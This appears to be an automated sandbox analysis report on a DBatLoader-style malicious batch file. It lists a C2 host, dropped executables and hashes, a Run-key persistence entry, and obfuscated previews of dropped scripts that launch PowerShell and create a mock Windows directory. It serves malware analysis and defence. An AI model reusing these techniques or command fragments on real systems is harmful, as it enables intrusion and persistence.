Kyvoykbd.PIF, 00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0C	pointer.com, 00000008.00000003.1689587889.000000007EE90000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1721877253.0000000011390000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725576300.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1693260679.0000000012434000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000001.1696850208.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000001.1834966037.0000000000710000.00000040.00000001.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000710000.00000040.00000400.00020000.00000000.sdmp, truesight.sys.8.dr	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com/u	Kyvoykbd.PIF, 0000001A.00000003.1903375914.00000000006AE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.pmail.com0	pointer.com, 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1695608530.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725427187.0000000012B1B000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000003.1695215614.0000000012A71000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1723986250.0000000012303000.00000004.00001000.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1706456681.0000000002C10000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000002.2905399025.0000000034B5E000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000002.2903919561.0000000031E8A000.00000004.00000020.00020000.00000000.sdmp, Kyvoykbd.PIF, 0000001A.00000002.1907480971.0000000002EE9000.00000004.00001000.00020000.00000000.sdmp, Kyvoykbd.PIF, 0000001A.00000002.1906314085.0000000002C5C000.00000004.00001000.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000002.1936537940.0000000025FDA000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif.8.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
13.107.139.11	dual-spov-0006.spov-msedge.net	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
91.92.254.111	burger042.ddnsfree.com	Bulgaria		34368	THEZONEBG	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	39.0.0 Ruby
Analysis ID:	1387342
Start date and time:	2024-02-06 08:47:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PRODUCT.bat
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winBAT@48/13@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 111 Number of non-executed functions: 268
Cookbook Comments:	Found application associated with file extension: .bat

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.42.12
Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, odc-am-files-geo.onedrive.akadns.net, ctldl.windowsupdate.com, am-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-am-files-brs.onedrive.akadns.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:48:03	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Kyvoykbd C:\Users\Public\Kyvoykbd.url
07:48:11	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Kyvoykbd C:\Users\Public\Kyvoykbd.url
08:47:59	API Interceptor	2x Sleep call for process: pointer.com modified
08:48:14	API Interceptor	2x Sleep call for process: Kyvoykbd.PIF modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
13.107.139.11	PO4540542295GTS-EE-9507-QTN-9507-232.bat	Get hash	malicious	DBatLoader	Browse
	USPS_Receipt_Details_06_02__2024.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	rPO9003293.bat	Get hash	malicious	Remcos, DBatLoader	Browse
	https://1drv.ms/b/s!AqZOxKSu-d3ihb4-54i24ztV6tqQCQ?e=hxqCGg	Get hash	malicious	Unknown	Browse
	purchaseorder.bat	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse
	stan.hunter@2sfg.com-Electronic Payment_Fax_Receipt_ATT00001#.file.html	Get hash	malicious	HTMLPhisher	Browse
	https://1drv.ms/o/c/ebd426c84729c90a/Em7gy6J06Y1HnoLmSIxNaw8BNbUXB2Ev9x5G0Wdyda-RVA?e=XCG0X9	Get hash	malicious	HtmlDropper, HTMLPhisher, SharepointPhisher	Browse
	SecuriteInfo.com.Win32.RansomX-gen.986.4839.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	INVOICE-098789000.bat.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	QUOTATION-QU88272001.exe	Get hash	malicious	Remcos, DBatLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dual-spov-0006.spov-msedge.net	PO4540542295GTS-EE-9507-QTN-9507-232.bat	Get hash	malicious	DBatLoader	Browse	13.107.137.11
	USPS_Receipt_Details_06_02__2024.exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.139.11
	rPO9003293.bat	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.139.11
	purchaseorder.bat	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse	13.107.137.11
	stan.hunter@2sfg.com-Electronic Payment_Fax_Receipt_ATT00001#.file.html	Get hash	malicious	HTMLPhisher	Browse	13.107.137.11
	DOCM_PAY7834_C476548383781235656_pdf_(114KB).vbs	Get hash	malicious	Remcos, GuLoader	Browse	13.107.137.11
	https://1drv.ms/o/c/ebd426c84729c90a/Em7gy6J06Y1HnoLmSIxNaw8BNbUXB2Ev9x5G0Wdyda-RVA?e=XCG0X9	Get hash	malicious	HtmlDropper, HTMLPhisher, SharepointPhisher	Browse	13.107.137.11
	POTsl35.bat.exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.137.11
	SecuriteInfo.com.Win32.RansomX-gen.986.4839.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	13.107.137.11
	Swift_EUR97k_pdf.bat.exe	Get hash	malicious	DBatLoader, FormBook	Browse	13.107.137.11

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	PO4540542295GTS-EE-9507-QTN-9507-232.bat	Get hash	malicious	DBatLoader	Browse	13.107.137.11
	6Ts4MrwFq7.elf	Get hash	malicious	Mirai	Browse	206.191.229.56
	ARJ5fFBctI.elf	Get hash	malicious	Mirai	Browse	20.67.73.79
	fjM0TNqIVG.elf	Get hash	malicious	Mirai	Browse	20.67.62.145
	HoDXu8xCf7.elf	Get hash	malicious	Mirai	Browse	52.186.170.125
	3X3LctXa5d.elf	Get hash	malicious	Mirai	Browse	51.142.97.139
	EGP6SCPJgv.elf	Get hash	malicious	Mirai	Browse	40.69.88.144
	jpfe7Hp2Zy.elf	Get hash	malicious	Mirai	Browse	20.210.161.55
	UZNjIqICP4.elf	Get hash	malicious	Mirai	Browse	20.72.210.252
	https://lookerstudio.google.com/s/r6el1fV3yro	Get hash	malicious	HTMLPhisher	Browse	13.107.213.51
THEZONEBG	zlhHGSO4tA.exe	Get hash	malicious	PureLog Stealer	Browse	91.92.255.205
	SecuriteInfo.com.Trojan.PackedNET.2665.14107.18184.exe	Get hash	malicious	Snake Keylogger	Browse	91.92.255.235
	VergiOdemesi.exe	Get hash	malicious	Snake Keylogger	Browse	91.92.255.235
	#U015eubat_Sipari#U015fi.exe	Get hash	malicious	Snake Keylogger	Browse	91.92.255.235
	ORDER#20240129.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	91.92.255.235
	REQUEST_FOR_QUOTATION.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	91.92.255.235
	purchaseorder.bat	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse	91.92.247.108
	sH3tjiI2x3.exe	Get hash	malicious	RHADAMANTHYS	Browse	91.92.252.107
	TaxForm.lnk	Get hash	malicious	DarkGate, MailPassView	Browse	91.92.254.96
	ksI7ApyLEx.elf	Get hash	malicious	Unknown	Browse	91.92.244.204

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	PO4540542295GTS-EE-9507-QTN-9507-232.bat	Get hash	malicious	DBatLoader	Browse	13.107.139.11
	MdO7pWHaxQ.exe	Get hash	malicious	LummaC, Amadey, Fabookie, Glupteba, LummaC Stealer, PureLog Stealer, RedLine	Browse	13.107.139.11
	YoECnoo0ah.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	13.107.139.11
	6XftWVqBgl.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	13.107.139.11
	https://docs.google.com/presentation/d/e/2PACX-1vSH4lM7eQkU2av073dET-ylOnpWK7x2UsSsoo1EBJFZ3Jc3jlG3kq60tNbeKZ3zuoY3RyYhb8SjGR9o/pub?start=false&loop=false&delayms=3000&slide=id.p	Get hash	malicious	HTMLPhisher	Browse	13.107.139.11
	Payment_Request.xlsx	Get hash	malicious	HTMLPhisher	Browse	13.107.139.11
	7abf5ad882fd72332b0b7fb530c8c6505852d4f7ea39edfe444218bdcd9c7f0e_dump.exe	Get hash	malicious	Glupteba, SmokeLoader, Stealc	Browse	13.107.139.11
	file.exe	Get hash	malicious	LummaC	Browse	13.107.139.11
	SecuriteInfo.com.Trojan.MSIL.zgRAT.Heur.12729.4854.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	13.107.139.11
	USPS_Receipt_Details_06_02__2024.exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.139.11

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Libraries\dbkyovyK.pif	purchaseorder.bat	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse
	PO11550.exe	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse
	SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Get hash	malicious	AgentTesla, DBatLoader, RedLine	Browse
	PCMNil7wkU.exe	Get hash	malicious	AgentTesla, AsyncRAT, DBatLoader, RedLine	Browse
	tTIYCp2sf4.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	Re_Porforma_Invoice_60_downpayment_-_PT_Era_F1909003_Project_Kupang.exe	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse
C:\Users\Public\Libraries\easinvoker.exe	USPS_Receipt_Details_06_02__2024.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	rPO9003293.bat	Get hash	malicious	Remcos, DBatLoader	Browse
	purchaseorder.bat	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse
	POTsl35.bat.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	Swift_EUR97k_pdf.bat.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	file.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	INVOICE-098789000.bat.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	PO11550.exe	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse
	QUOTATION-QU88272001.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	POT987654567000900.exe	Get hash	malicious	DBatLoader, Remcos	Browse

Created / dropped Files

C:\Users\Public\Kyvoykbd.url

Download File

Process:	C:\Users\Public\pointer.com
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Kyvoykbd.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	100
Entropy (8bit):	5.057404160633784
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMbHO0ovsb990uAR:HRYFVmTWDyz+OJE9CR
MD5:	781007748B18F88511F5AE4CA22A6F1A
SHA1:	E9CDC4E5CEC1EB766D4449B9854011ADF15596CF
SHA-256:	AEFB95DA9AFEAEFC6FA174A5B2044F346F3CE3E74B27B5DE265100BD628ADBEB
SHA-512:	BCBD333977EBE083E4B646B89CC05016A25789A1021015DE3CA92F72F2D69FA3D8D075B7F40AFAAA6605E4DA5B3BC72EFFE109245A33186FDADB2C6458993AA5
Malicious:	true
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Kyvoykbd.PIF"..IconIndex=55..HotKey=34..

C:\Users\Public\Libraries\KDECO.bat

Download File

Process:	C:\Users\Public\pointer.com
File Type:	Unicode text, UTF-8 text, with very long lines (1255), with CRLF line terminators
Category:	dropped
Size (bytes):	5074
Entropy (8bit):	5.576997140126768
Encrypted:	false
SSDEEP:	96:SXISfSQ06ldNpeDSMfZ5eFsOWSaQmHs7k8qntYlBT1g8klpiyqYr4Vgc5KsW3:4ISBl1eDS3sLBMBW8k35R4VgXsa
MD5:	785E8193007BCD7858B9DF41C9D45F89
SHA1:	29B206DE05AB075138CA9E0B9FCCDDDF3C30CDFE
SHA-256:	C8E1912A3328802E98563E32EB053AE3E28249B701054AF227E9F1BA6BFE24D9
SHA-512:	A4D6FD586800F27939D8C152E89D2A231DC9FD8466E715DFEBA22E2AA0428509095E12E6E66F2CB5E40FF5C998B439DC3F6792E20C179F41AC9CAE31ADA9D45F
Malicious:	false
Preview:	s%.... .%t%.......%a%.....%r%.....%t%..% %.%/%.. ...%m%....%i%....%n%.....% %.......%c%.%m%..........%d%.....% %........%/%........%c%.........% %. ......% %..%p%.....%o%..........%w%..........%e%...%r%...%s%....%h%...... .%e%........%l%......%l%.......%.%.........%e% ......%x% .%e%.........% %.......%-%....%i%........%n%....... %p%.......%u%........%t%......%f%.......%o%..........%r%.....%m%... %a%.....%t%....% %........%n%..%o%...

C:\Users\Public\Libraries\Kyvoykbd.PIF

Download File

Process:	C:\Users\Public\pointer.com
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1951744
Entropy (8bit):	7.587515946144899
Encrypted:	false
SSDEEP:	49152:Dy6SW7XUFcn9rcFw/uRHtojhvQIBXFlxvAr:D8W7EFcBURHtojhvQIBXFlx
MD5:	9D00A95BE6B82AB307043A988595487B
SHA1:	71AEA046547DC1F55977CFA5CF969529004E4714
SHA-256:	1D53D90687C4F61739B3D186D0C296A3FE47B0DA1F599AC8115E11194AD49B30
SHA-512:	8AEE0B7FB748F19AF30F73021B23B09B4A3281EAE1B4D6A99C20FBD47E38E66F4B66937FD54EEE6DA7986F87519FAD6635985B86B0657D128A738E4106654950
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Kyvoykbd.PIF, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................D.............@.......................... ...................@................................... ..........................tZ..................................................................................CODE................................ ..`DATA.....S.......T..................@...BSS.....U....p.......P...................idata........... ...P..............@....tls.................p...................rdata...............p..............@..P.reloc..tZ.......\...r..............@..P.rsrc........ ......................@..P............. ......................@..P........................................................................................................................................

C:\Users\Public\Libraries\KyvoykbdO.bat

Download File

Process:	C:\Users\Public\pointer.com
File Type:	Unicode text, UTF-8 text, with very long lines (588), with CRLF line terminators
Category:	dropped
Size (bytes):	7267
Entropy (8bit):	5.588765938257515
Encrypted:	false
SSDEEP:	96:d/MTt2AdgpRXp2iRk1gLnjrL8DKzGrqpQo8G4rBlV+NZxHlwcGCsmZ8ftIhu6yN2:mhdgPZoKnjv8Nrmz8nrByNWc7eIhu6h
MD5:	0D0D24B46D4BB0E4962595D455020D48
SHA1:	48B247C1CB2577B28AABD7DFA999E0642B5DC6DE
SHA-256:	F46E0CC2C119A32DD87EDF97BFC73D985EE97D2C9DC00274B6B20D641E29DEEA
SHA-512:	D5A8779E1CFD2A284173CE8A205CACB41FC7C744FA84E55682AC50B327C676FF50F668ECD176E0AB84420D143A8023D8B4590362B223704C55F5B0D7E116BA2C
Malicious:	true
Preview:	s%......%t%.....%a%.......%r%......%t%....% %.......%/%...%m%.%i%..........%n%........% %......%c%....%m%.........%d%...% %....%/%.......%c%.% %..........% %.%m%.......%k%..%d%..........%i%. ....%r%..........% %......%"%.%\%....%\%..%?%.... ..%\%...%C%.......%:%..........%\%.%W%.%i%..%n%.........%d%.........%o%......%w%.......%s%.% %........%"%...% %.......% %....%&%.........%..m%......%k%.......%d%..%i%..%r%..% %.....%"%..........%\%..%\%.

C:\Users\Public\Libraries\Null

Download File

Process:	C:\Users\Public\pointer.com
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:Bv:Z
MD5:	6E7931A650D82FA4F83332BEBE8AD018
SHA1:	311732BAD841789F43C3EF055A9FDF8A261AE4A8
SHA-256:	CE60DA21A19E0A3D484FC4EE3F868999745B7F23475772EA8C87C7BDE54C4B43
SHA-512:	BD7BBFA2722C680021FFA084438E4303283D866D24CE62BE842D4115C6094B4AA891CBBFCDB1CAD59D68A6A54649738EE4DB198DA3B5EEB25E07ACC5FD357426
Malicious:	false
Preview:	21..

C:\Users\Public\Libraries\dbkyovyK.pif

Download File

Process:	C:\Users\Public\pointer.com
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	175800
Entropy (8bit):	6.631791793070417
Encrypted:	false
SSDEEP:	3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
MD5:	22331ABCC9472CC9DC6F37FAF333AA2C
SHA1:	2A001C30BA79A19CEAF6A09C3567C70311760AA4
SHA-256:	BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
SHA-512:	C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: purchaseorder.bat, Detection: malicious, Browse Filename: PO11550.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, Detection: malicious, Browse Filename: PCMNil7wkU.exe, Detection: malicious, Browse Filename: tTIYCp2sf4.exe, Detection: malicious, Browse Filename: Re_Porforma_Invoice_60_downpayment_-_PT_Era_F1909003_Project_Kupang.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............\|..8...,...@...@..@

C:\Users\Public\Libraries\easinvoker.exe

Download File

Process:	C:\Users\Public\pointer.com
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	131648
Entropy (8bit):	5.225468064273746
Encrypted:	false
SSDEEP:	3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
MD5:	231CE1E1D7D98B44371FFFF407D68B59
SHA1:	25510D0F6353DBF0C9F72FC880DE7585E34B28FF
SHA-256:	30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
SHA-512:	520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: USPS_Receipt_Details_06_02__2024.exe, Detection: malicious, Browse Filename: rPO9003293.bat, Detection: malicious, Browse Filename: purchaseorder.bat, Detection: malicious, Browse Filename: POTsl35.bat.exe, Detection: malicious, Browse Filename: Swift_EUR97k_pdf.bat.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: INVOICE-098789000.bat.exe, Detection: malicious, Browse Filename: PO11550.exe, Detection: malicious, Browse Filename: QUOTATION-QU88272001.exe, Detection: malicious, Browse Filename: POT987654567000900.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

C:\Users\Public\Libraries\netutils.dll

Download File

Process:	C:\Users\Public\pointer.com
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	119348
Entropy (8bit):	5.036227513809768
Encrypted:	false
SSDEEP:	1536:ngUYdGSz8ID3zjydXtt1msimYU15jNBQU7l4uCl7MbiRXRv179XF:ngU6GSzP/ot1PYUlBQU7l4vRv179XF
MD5:	EF43F3E84500F2528FF56B144C07C8A2
SHA1:	F56579F77AD20EBEA21025A215E6FFAF7637B3B4
SHA-256:	4E7D74A4890AF9128E04C758D8E5FA9488FF22DA64979725B26FCB0E8806E6F5
SHA-512:	A6C509BB881F2098460E24D8D9DB5E8ED9900B3AFA9E3A84752B550C41F3F367E875578ABC4CF72A4FE313C03793426837E28886B5029E8D153613D38A3F7138
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34% Antivirus: Virustotal, Detection: 43%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Rich.`......... .....$...$................<a.............................0......'&........ ..............................................................`..(...............\........................... ...(...........................................................P".......$.................. .P`.............@.......0..............@.p..............P.......8..............@.P@........(....`.......>..............@.0@.............p.......B..............@.0@......................................p......................D..............@.0@.....................F..............@.0.........X............N..............@.@.........h............P..............@.`.........\............R..............@.0B/4...................T..............@.PB/19..................X..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

C:\Users\Public\Libraries\truesight.sys

Download File

Process:	C:\Users\Public\pointer.com
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	53696
Entropy (8bit):	6.830243356027624
Encrypted:	false
SSDEEP:	768:58GYJAAcoglJBtzCMSS4cTl9zIG3Hzuaq1ocezTBk4/HvAMxkExHs1R9zZ1SP8P:xKAAhYJz53WloceBkGHvxxIzzSPG
MD5:	F53FA44C7B591A2BE105344790543369
SHA1:	363068731E87BCEE19AD5CB802E14F9248465D31
SHA-256:	BFC2EF3B404294FE2FA05A8B71C7F786B58519175B7202A69FE30F45E607FF1C
SHA-512:	55B7B7CDA3729598F0EA47C5C67761C2A6B3DC72189C5324F334BDF19BEF6CE83218C41659BA2BC4783DAA8B35A4F1D4F93EF33F667F4880258CD835A10724D9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8% Antivirus: Virustotal, Detection: 6%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...rp..rp..rp..)...vp..)...wp..)...qp..rp..$p..)...up......\|p......sp......sp..Richrp..................PE..d...}..d.........."......X..."......p..........@...........................................A................................................\...(............p..D....~...S......l...@I..8............................I...............@..X............................text....-.......................... ..h.rdata.......@.......2..............@..H.data... ....`.......D..............@....pdata..D....p.......H..............@..HPAGE.................N.............. ..`INIT.................l.............. ..b.rsrc................x..............@..B.reloc..l............\|..............@..B........................................................................................................................................................................................

C:\Users\Public\pointer.com

Download File

Process:	C:\Windows\System32\certutil.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1951744
Entropy (8bit):	7.587515946144899
Encrypted:	false
SSDEEP:	49152:Dy6SW7XUFcn9rcFw/uRHtojhvQIBXFlxvAr:D8W7EFcBURHtojhvQIBXFlx
MD5:	9D00A95BE6B82AB307043A988595487B
SHA1:	71AEA046547DC1F55977CFA5CF969529004E4714
SHA-256:	1D53D90687C4F61739B3D186D0C296A3FE47B0DA1F599AC8115E11194AD49B30
SHA-512:	8AEE0B7FB748F19AF30F73021B23B09B4A3281EAE1B4D6A99C20FBD47E38E66F4B66937FD54EEE6DA7986F87519FAD6635985B86B0657D128A738E4106654950
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\pointer.com, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................D.............@.......................... ...................@................................... ..........................tZ..................................................................................CODE................................ ..`DATA.....S.......T..................@...BSS.....U....p.......P...................idata........... ...P..............@....tls.................p...................rdata...............p..............@..P.reloc..tZ.......\...r..............@..P.rsrc........ ......................@..P............. ......................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Microsoft Vision\06-02-2024_08.48.06

Download File

Process:	C:\Users\Public\Libraries\dbkyovyK.pif
File Type:	data
Category:	modified
Size (bytes):	66
Entropy (8bit):	3.1471230066161446
Encrypted:	false
SSDEEP:	3:blXlulovDluLsWAolsx7lql2C1n:zuWFg2nqlD1
MD5:	6083FC05C4B3B881902A5A0048538115
SHA1:	6C7276BEE30F4B9064404F768D64947B080D2DAA
SHA-256:	6E9D19EF4520E2387DB729F0BFBB859DDBEF65D1FAEE79F6EA53EED42167A5C9
SHA-512:	9AD2E0790D31163527D5D577450DD3B21678ABF3D71631890CD68C378A9306E9ED867F6D44931AC2D3C523F31C81E6C3822C345D236891CF980974A5A6FFF368
Malicious:	false
Preview:	..{.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.}...L.I.N.K.E. .W.I.N.D.O.W.S.r.

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	331
Entropy (8bit):	4.92149009030101
Encrypted:	false
SSDEEP:	6:PzLSLzMRfmWxHLThx2LThx0sW26VY7FwAFeMmvVOIHJFxMVlmJHaVFEG1vv:PKMRJpTeT0sBSAFSkIrxMVlmJHaVzvv
MD5:	2E512EE24AAB186D09E9A1F9B72A0569
SHA1:	C5BA2E0C0338FFEE13ED1FB6DA0CC9C000824B0B
SHA-256:	DB41050CA723A06D95B73FFBE40B32DE941F5EE474F129B2B33E91C67B72674F
SHA-512:	6B4487A088155E34FE5C642E1C3D46F63CB2DDD9E4092809CE6F3BEEFDEF0D1F8AA67F8E733EDE70B07F467ED5BB6F07104EEA4C1E7AC7E1A502A772F56F7DE9
Malicious:	false
Preview:	..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
Entropy (8bit):	5.96165220452879
TrID:	MP3 audio (ID3 v1.x tag) (2501/1) 45.44% Text - UTF-16 (LE) encoded (2002/1) 36.37% MP3 audio (1001/1) 18.19%
File name:	PRODUCT.bat
File size:	2'701'509 bytes
